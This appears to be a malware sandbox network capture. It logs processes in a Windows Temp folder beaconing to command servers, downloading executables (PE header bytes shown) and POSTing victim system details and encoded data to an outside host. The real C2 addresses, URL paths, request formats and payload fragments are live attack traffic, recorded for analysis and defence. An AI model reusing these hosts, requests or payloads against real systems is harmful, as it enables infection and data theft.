Dec 18, 2024 13:38:33.204250097 CET	1236	IN	Data Raw: 5c be 96 2a 3e 70 59 79 44 7a 08 10 f0 1f 67 c3 b0 67 87 27 cc ba 83 09 32 17 b6 7e 39 0d 49 e5 5d 9d 67 16 fa 12 cb f5 25 0a 20 91 f3 45 b0 97 aa f0 20 e8 38 8d eb 5d da 14 18 98 0f 0e 9b 66 8f 32 e8 b8 68 a2 ca f2 51 e6 f2 9d 08 2f 87 b8 f2 94 Data Ascii: \>pYyDzgg'2~9I]g% E 8]f2hQ/Vi87M}"e4u<Ld+.'su5v$MP(0y,RX^e&1\|?my,5uPzG<Tn~ArkS7c)6EhqBCZGQR]aI[h==Y%RT7
Dec 18, 2024 13:38:33.204262018 CET	896	IN	Data Raw: 54 86 04 11 72 92 88 75 2a e2 d9 99 29 a5 7c 9d 92 7d 8e e2 8f 6f 06 0f 2a 79 8c 7d 70 1d 28 30 9d c1 50 6e fb 8c 1f ba d3 8a 6c 86 49 a0 48 6e 8b de c9 7f c0 40 37 56 48 32 be c4 d5 92 10 ad c5 7d 1e 29 81 54 9e 18 16 f2 84 85 f2 b1 8f 89 43 39 Data Ascii: Tru)\|}oy}p(0PnlIHn@7VH2})TC9vh\|ai@lN63!2YiXp4`vy<;{iA5p$L+t{%F0P,2QA{)ub!^}gmFTC]d'0DF
Dec 18, 2024 13:38:33.204555035 CET	1236	IN	Data Raw: a1 87 59 6b 20 c9 14 56 55 bb 3b 97 4d 6c e3 eb fe 7a 64 e2 f1 44 34 9c ae 8e 25 f9 9b 1a 07 f3 c0 3f d1 0c ae 38 dc 81 fd e6 67 71 64 81 8c e9 de 93 7b 2f 44 06 65 16 6b 67 21 cf ab a2 64 fd ed 5e dc 50 15 79 fc 5f ce 5e 08 91 50 3e e6 7b d3 fe Data Ascii: Yk VU;MlzdD4%?8gqd{/Dekg!d^Py_^P>{<f3?.J)$s5"`,kN}vu8$Xti@xt_k"nEIvtQ:HUPf_DtY1QF`-!@ "@+jqZ!Urw{\|
Dec 18, 2024 13:38:33.204566956 CET	224	IN	Data Raw: be fa 20 f8 12 32 67 f6 9b f5 3c 53 70 26 12 3e 38 bf 22 bd 05 79 1c c2 e9 ae 68 8b 59 12 df b6 ae 8e 68 4b f1 ec 25 23 66 2f de bc 95 c2 23 1b 54 9a 10 31 f0 f5 7b 7f d9 7d 53 b3 f1 66 ad 1c c8 61 c2 1b 5b 54 c8 17 42 0c db ff 51 91 7d dd 9e 47 Data Ascii: 2g<Sp&>8"yhYhK%#f/#T1{}Sfa[TBQ}G\|)i~'\/\|Hm?@=InBqgE;$gel0oTov7;"K2ZVa)ORW<TlH25;\-o-(go
Dec 18, 2024 13:38:33.204579115 CET	1236	IN	Data Raw: 12 bb 6c 86 c3 e0 18 4a 24 44 1d 7e c1 06 98 8d ed 5d 90 e6 e2 e0 b6 f1 65 6f 6c 9d 54 1e e7 38 b8 8d 4c 19 6e 5e c0 a1 25 b7 9c 57 61 5d b5 62 1e d0 97 56 de 3a 06 51 cc 07 f7 72 d1 7f 11 de c2 e9 c8 fa ad f4 a3 a1 98 c3 1b e3 60 d5 59 61 ad cb Data Ascii: lJ$D~]eolT8Ln^%Wa]bV:Qr`Ya)Q7PrcOD]} &gVG+A=`^XV_FP\|gvp)x-h;leHX\|)vg,[c8R]]4qH%@[bP~^
Dec 18, 2024 13:38:33.323555946 CET	1236	IN	Data Raw: d7 e9 12 a6 27 52 c7 da 25 a1 2c de 25 62 7b f7 ff 82 ed a8 33 90 20 45 a9 04 c1 f2 46 5f ec 6b 8a 18 84 59 9f 58 1f a5 3d 6f 2e 7e 59 37 e0 c4 51 5c 34 77 7b fd 78 50 2e 47 b6 a9 2f 05 e5 ca 8b bf 0b 8e 09 3a 26 7e b8 87 9f c9 75 ea 36 6c 47 ab Data Ascii: 'R%,%b{3 EF_kYX=o.~Y7Q\4w{xP.G/:&~u6lG,E4]T0SX20S:/3N^UhSB6;P\|??" i.wrRr1F-8??""]vQ<E]J[X{vN3/vAK,R\|1!g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49720	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:42.684401989 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 38 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016897001&unit=246122658369
Dec 18, 2024 13:38:44.024873018 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49723	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:44.153817892 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 18, 2024 13:38:45.499732971 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:45 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 18, 2024 13:38:45.499941111 CET	1236	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3D$tlA
Dec 18, 2024 13:38:45.499954939 CET	1236	IN	Data Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5 Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
Dec 18, 2024 13:38:45.500529051 CET	1236	IN	Data Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
Dec 18, 2024 13:38:45.500541925 CET	896	IN	Data Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW\|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
Dec 18, 2024 13:38:45.500910997 CET	1236	IN	Data Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33 Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
Dec 18, 2024 13:38:45.500924110 CET	1236	IN	Data Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B\|2_^[Ar91\|S\$VWu33\|$Gt$P$AtF;w\|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~
Dec 18, 2024 13:38:45.501539946 CET	1236	IN	Data Raw: 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b 5c 24 14 53 e8 d0 e6 ff ff 8b 06 50 03 c3 50 8b cf e8 ec fa ff ff 5f 5e 5b c2 08 00 8b 44 24 08 ff 30 8b 44 Data Ascii: 7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W\|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?ESAPQNPWuSuA
Dec 18, 2024 13:38:45.501553059 CET	1236	IN	Data Raw: 4d f4 e8 72 f8 ff ff f6 85 a4 fd ff ff 10 8b 7d f4 74 35 68 88 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 33 68 80 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 1d 57 e8 58 ff ff ff 59 eb 10 6a 00 57 ff d6 85 c0 74 4b 57 Data Ascii: Mr}t5hAP$At3hAP$AtWXYjWtKWAt@PSAqSAjutuAtW_3@W_3Y_^[=lAt3@Vt$VAu3@^ujVAtVA^3^VY^
Dec 18, 2024 13:38:45.502167940 CET	1236	IN	Data Raw: 8d 4d a4 e8 d0 dd ff ff 8d 4d b0 e8 c8 dd ff ff 8b 4d fc 8b 07 89 4d f8 8d 34 08 8d 4d d4 e8 e3 f3 ff ff 8a 0e 33 db eb 14 80 f9 3d 74 1d ff 75 f4 8d 4d d4 e8 d5 f4 ff ff 43 8a 0c 1e 8a c1 88 4d f4 e8 57 e7 ff ff 84 c0 74 de 68 e9 fd 00 00 8d 45 Data Ascii: MMMM4M3=tuMCMWthEPEP^PMuZuZYY ]M M<=EMu<"t<-uulYFYuE0AFe
Dec 18, 2024 13:38:45.623447895 CET	1236	IN	Data Raw: 0b c1 66 2d 75 00 66 f7 d8 1b c0 83 e0 09 83 c0 10 57 33 ff eb 0b 66 3b cf 0f 84 8b 02 00 00 46 46 0f b7 0e 66 83 f9 2c 75 ec 57 50 8d 85 84 fd ff ff 50 57 ff 15 5c a2 41 00 85 c0 0f 84 68 02 00 00 8d 85 84 fd ff ff 50 8d 4d e4 e8 2f ee ff ff 8d Data Ascii: f-ufW3f;FFf,uWPPW\AhPM/MMMMMMM{MsEPV9}YYu@uUuUuUuUuUuUuUuMQP`MQPV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49725	185.185.71.170	80	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:47.320904016 CET	12360	OUT	POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: / Content-Type: application/json Content-Length: 578513 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 32 35 35 32 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734525523", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 18, 2024 13:38:47.440841913 CET	4944	OUT	Data Raw: 41 4c 70 54 75 5c 2f 38 41 65 6b 72 5c 2f 41 4a 78 36 31 2b 55 58 78 49 38 49 48 34 65 5c 2f 45 50 78 37 34 42 62 55 42 71 78 38 44 2b 4e 50 46 50 68 41 36 71 4c 55 32 49 31 4d 2b 47 74 63 76 74 46 4f 6f 43 79 4e 78 64 6d 7a 46 36 62 4c 37 53 4c Data Ascii: ALpTu\/8Aekr\/AJx61+UXxI8IH4e\/EPx74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvtE2zzG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7
Dec 18, 2024 13:38:47.440884113 CET	4944	OUT	Data Raw: 6a 34 39 5c 2f 39 52 58 56 71 31 71 55 33 54 6c 62 6d 6a 4f 4d 6b 70 30 36 6c 4e 38 31 4f 72 54 6b 72 78 71 51 6c 5a 4e 78 6b 75 6b 6c 47 63 4a 4a 77 71 52 68 55 6a 4b 45 59 54 64 35 52 6c 47 56 4f 70 42 71 4e 53 6e 4f 33 50 43 54 6a 47 61 54 35 Data Ascii: j49\/9RXVq1qU3TlbmjOMkp06lN81OrTkrxqQlZNxkuklGcJJwqRhUjKEYTd5RlGVOpBqNSnO3PCTjGaT5XKElKEo1KdSnKdKtSnTrUalSjUp1Jf5uVlf22owLcWcwnhb7siRAqfoQxqaT\/b\/AHg5wK80+EG5vB9i7MWOCcnJ7k4zmvUfL6fPs\/yewxX\/AEMZLj55plOX5jUhGnPGYWjiJU4NuMHVpxm4pvV2btc\/xDzbB
Dec 18, 2024 13:38:47.440936089 CET	7416	OUT	Data Raw: 52 54 52 58 66 5c 2f 43 4a 65 46 6c 6d 67 76 64 58 61 4a 34 57 31 43 36 6b 30 33 51 49 4c 71 79 75 4e 58 6a 76 37 54 32 33 39 6b 44 5c 2f 41 49 4b 4d 5c 2f 43 72 39 6f 48 39 6c 54 58 66 6a 7a 34 35 31 72 53 50 42 4f 75 66 42 5c 2f 51 32 50 78 38 Data Ascii: RTRXf\/CJeFlmgvdXaJ4W1C6k03QILqyuNXjv7T239kD\/AIKM\/Cr9oH9lTXfjz451rSPBOufB\/Q2Px80fe\/l+HNSsLJ7hNb0exLTahdaD4ySB7nwrBELu6n1NrvwrBNqOraVO0v8AnzmvAOfYXKcx4qy7w0y\/F8KUuMMZwlgMeq\/FdfF4rFU8bUwWFmsNR4jjUrUa2JhDLo4ylQWFqZpL6hTccRJUV\/q5lPiBkGLzbLu
Dec 18, 2024 13:38:47.440994024 CET	2472	OUT	Data Raw: 66 4a 2b 38 32 4f 36 52 76 35 66 37 72 5c 2f 57 5c 2f 38 75 5c 2f 38 41 79 36 59 37 31 4e 35 4b 62 55 64 78 76 53 58 5c 2f 41 4a 5a 2b 62 2b 34 5c 2f 36 2b 76 5c 2f 41 4b 5c 2f 66 39 61 72 66 4a 4a 2b 37 32 66 50 47 66 33 58 37 72 5c 2f 50 2b 66 Data Ascii: fJ+82O6Rv5f7r\/W\/8u\/8Ay6Y71N5KbUdxvSX\/AJZ+b+4\/6+v\/AK\/f9arfJJ+72fPGf3X7r\/P+f1n2vnL+vmdAxf49\/wAiSf609+vH8+fqKEkfCeS+\/wDeiLzOkH+en+eaftf5P9X\/AK3\/AD3\/AM9Oc0ySP+PZs\/6aGXz8dfX8f\/10e185f18wGbUjk3p84\/1sv\/Tb9P6479aXd+7cJ5m+OL+CL6\/5\/rz
Dec 18, 2024 13:38:47.441111088 CET	4944	OUT	Data Raw: 49 30 4e 31 34 6e 31 58 78 4e 34 75 30 7a 55 39 52 69 69 5a 69 74 75 2b 6f 52 36 4c 61 58 64 33 48 46 68 4a 74 51 6c 75 37 77 6a 7a 62 71 51 6e 39 4d 39 4c 5c 2f 62 76 5c 2f 5a 54 74 77 67 6e 2b 4b 6d 7a 62 6e 5c 2f 6d 52 5c 2f 69 4f 33 48 50 39 Data Ascii: I0N14n1XxN4u0zU9RiiZitu+oR6LaXd3HFhJtQlu7wjzbqQn9M9L\/bv\/ZTtwgn+Kmzbn\/mR\/iO3HP93wg1fld+358Y\/h98bPjL4Z8T\/DHXf+El8O6b8MNE8PXmpnS9b0by9atfFPjPUrmyWz1\/TNLvpBDZatp0puUtjaubgxxzPJDMqf6UfstfB76QHhn9JynmPGXhT4w8A8I5nwNxRl+b5hxPwJxnwvw7jK0Y4LFZXg
Dec 18, 2024 13:38:47.561038017 CET	2472	OUT	Data Raw: 72 56 39 58 2b 4a 66 78 79 2b 50 58 78 65 38 64 58 4e 39 38 42 5c 2f 46 2b 6d 2b 50 66 67 35 70 43 66 45 7a 34 72 66 45 33 78 6e 38 52 72 54 77 52 38 4f 66 47 47 6c 78 36 5c 2f 34 58 2b 48 46 6c 34 70 74 5c 2f 68 39 70 31 37 71 48 69 48 5a 34 59 Data Ascii: rV9X+Jfxy+PXxe8dXN98B\/F+m+Pfg5pCfEz4rfE3xn8RrTwR8OfGGlx6\/4X+HFl4pt\/h9p17qHiHZ4YaHxT4li1YA8Y\/Yh+OP7YvxT+PP7b3gz9pPwV8FvC\/hX4PfFzwT4S8F2Pww+M\/iD4nS+DrzWPgF8FfHd14L0+bWP2XfgLeeK\/C983jDUfGs\/j3xPqK+J7HxLr+oeA7TwlJ4W0DR\/E158yfs6ftl\/tL+DLPX
Dec 18, 2024 13:38:47.561321020 CET	12360	OUT	Data Raw: 6c 50 45 6e 5c 2f 4c 50 5c 2f 57 78 5c 2f 38 74 78 33 5c 2f 77 42 4c 75 38 2b 6e 48 74 54 4a 49 31 57 5a 30 5c 2f 65 62 4a 50 38 41 6c 70 4a 2b 5c 2f 6e 36 5c 2f 79 5c 2f 6e 55 77 48 37 75 46 4e 6c 78 5c 2f 77 42 73 5c 2f 77 42 5c 2f 62 5c 2f 6e Data Ascii: lPEn\/LP\/Wx\/8tx3\/wBLu8+nHtTJI1WZ0\/ebJP8AlpJ+\/n6\/y\/nUwH7uFNlx\/wBs\/wB\/b\/n\/AJ6Uz++\/7xO\/mf8Atr\/njpQdBD5fmK\/kp8+fNH7r68j\/AD+GaI4\/ufPGPM\/5Z+V\/5K9f8\/jRJDCyxvsz1\/z\/AJ\/XueXIsab0kmT\/AFvvn16+n+T3z9n5\/h\/wS+d+X9fMhkZ2Lu77B\/q\/9V
Dec 18, 2024 13:38:47.601464033 CET	27192	OUT	Data Raw: 31 33 78 48 48 4a 4a 34 59 2b 4d 33 6a 54 39 6f 33 78 76 61 5c 2f 45 6e 34 62 2b 42 4e 49 31 54 34 6f 65 4b 5c 2f 42 74 35 34 39 30 5c 2f 34 6b 67 48 39 66 48 68 5c 2f 77 41 51 61 44 34 73 30 4c 52 66 46 50 68 58 57 39 49 38 53 2b 47 66 45 6d 6c Data Ascii: 13xHHJJ4Y+M3jT9o3xva\/En4b+BNI1T4oeK\/Bt5490\/4kgH9fHh\/wAQaD4s0LRfFPhXW9I8S+GfEmlafrvh3xH4f1Kz1nQte0PVrSK\/0rWdF1fTprnT9U0rU7GeC90\/UbG4ntL20miuLaaSGRHOvX4F\/tE\/tG\/tjfDHQf8AgpF4+8EfHjWtX039m\/4x\/s6\/AbwNofibwp8JNB8F\/C\/wB8Rvhr+yf4n+Mn7SHj
Dec 18, 2024 13:38:47.721714973 CET	8652	OUT	Data Raw: 70 72 2b 39 5c 2f 34 47 76 54 7a 5c 2f 58 35 57 50 35 48 56 4f 6e 36 66 4a 5c 2f 6f 7a 52 6b 73 4c 47 58 37 6a 79 57 7a 5c 2f 41 50 54 51 66 75 66 7a 78 6e 70 39 50 31 71 6c 4e 6f 38 32 64 38 4c 70 4e 7a 5c 2f 79 79 6c 37 65 76 2b 63 5a 7a 53 2b Data Ascii: pr+9\/4GvTz\/X5WP5HVOn6fJ\/ozRksLGX7jyWz\/APTQfufzxnp9P1qlNo82d8LpNz\/yyl7ev+cZzS+a3r+p\/wAaElZOhI989OnY\/Sj9x2kWp1YPdaO9nfX+uhnG1mhHzq4x6\/X069f6ZqvIcAZ6f5\/z+NfUP7L\/AMG5v2k\/jp4F+CA8Tjwf\/wAJs3iVV8TTaKfES6V\/wjng\/wAQeLnY6IuraEb\/AO2R6A+nqg
Dec 18, 2024 13:38:47.765345097 CET	1236	OUT	Data Raw: 41 44 75 61 79 6a 56 71 38 66 30 4f 48 73 52 6a 73 72 78 62 69 73 58 6c 47 62 34 54 4d 4d 48 6e 65 52 59 39 30 5a 63 75 4a 77 4f 49 6e 52 6f 54 78 57 58 34 70 53 68 54 78 32 42 77 65 4b 39 6e 44 47 59 4c 44 31 4b 58 38 71 2b 4e 33 43 75 65 5a 56 Data Ascii: ADuayjVq8f0OHsRjsrxbisXlGb4TMMHneRY90ZcuJwOInRoTxWX4pShTx2BweK9nDGYLD1KX8q+N3CueZV9Gb6ZHhr4i8MV6GC\/4l8zPxBp8M8U5U\/wDYOKuE8y4ezvgTjrJqWMpc+BzrAYfH42nk\/EeWSp1sTkGe5xlkMTXyfO8fh8T+bWPv\/wCe+f6Uv7v\/ADmpKj\/d\/wCc1\/vr7X+9+H\/AP+TQTP8Atn8j\/jTK
Dec 18, 2024 13:38:50.622371912 CET	164	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Wed, 18 Dec 2024 12:38:50 GMT content-type: text/html; charset=utf-8 content-length: 26 Data Raw: 4a 53 46 64 73 59 70 4e 41 79 4b 75 75 4d 4a 45 31 37 33 34 35 32 35 35 32 39 Data Ascii: JSFdsYpNAyKuuMJE1734525529

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49727	185.185.71.170	80	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:51.004192114 CET	126	OUT	GET /WEIsmPfDcpBFJozngnYN1734366322?argument=JSFdsYpNAyKuuMJE1734525529 HTTP/1.1 Host: home.twentytk20pn.top Accept: /
Dec 18, 2024 13:38:52.534244061 CET	1236	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Wed, 18 Dec 2024 12:38:52 GMT content-type: application/octet-stream content-length: 10816560 content-disposition: attachment; filename="wmhxbWrMmpOSXnEQUlz;" last-modified: Mon, 16 Dec 2024 16:25:22 GMT cache-control: no-cache etag: "1734366322.858812-10816560-3400407440" Data Raw: d5 59 3c ac 4f c5 f6 d3 51 7e 47 47 26 fc 67 8e 84 c9 d0 b9 c8 1a b5 f2 9f 36 58 4e 2a 47 78 b3 71 d6 90 99 2c 75 71 ee 05 07 6f e4 46 9c 81 25 65 1e b9 5c 4c cd 26 06 a2 8a 7f f2 65 9e 16 dd 0a 62 a6 54 b4 af c9 89 f9 fa 9d 0d e0 ee 45 13 e3 62 b4 7a 27 ea 09 83 39 68 2b 57 d4 60 b5 5e e3 8d 8a ca f3 0f 65 59 61 a9 31 84 ec 75 18 9f 24 5a b0 43 dc a9 88 a2 32 72 8c 21 0b 74 3a 35 c1 bb ab 53 27 66 6a 20 e9 40 bb 35 77 dc 6b 55 70 51 7b b4 f9 80 55 0a bb 5b 04 23 b9 54 94 13 ce 2c 0f 64 c3 37 11 71 7d c1 39 1d bd 7e 1d a8 c2 76 08 b7 bb e4 83 f9 ca ca 3f d4 dc a1 68 0b fd 09 4e df f0 a3 4b ae ec 74 e9 a6 d0 f3 8f 73 8f bf ae 9d b3 e6 e5 e8 01 1a e2 90 67 05 cf 14 df 94 91 9a ac 00 db 92 f7 18 9e cd ca 55 e2 d5 d7 f2 87 f7 fa 3e f6 0f 54 99 fb 85 6f 27 8f 0b 94 d4 df 07 de d7 fd d7 24 7d 3b e8 61 d3 13 51 b5 02 12 b2 41 76 6e ac e5 f8 d0 76 a2 58 a0 af b0 ed e4 17 7d e1 24 1c 2f d5 3b 76 8d 8f 0c ad 07 bf 79 f7 c3 7c ae 13 ae 2d b2 54 c1 39 70 46 45 22 5c aa 6d 59 19 8b e5 22 88 83 18 44 c0 92 bf b1 [TRUNCATED] Data Ascii: Y<OQ~GG&g6XNGxq,uqoF%e\L&ebTEbz'9h+W`^eYa1u$ZC2r!t:5S'fj @5wkUpQ{U[#T,d7q}9~v?hNKtsgU>To'$};aQAvnvX}$/;vy\|-T9pFE"\mY"D7kamD}?@ZY 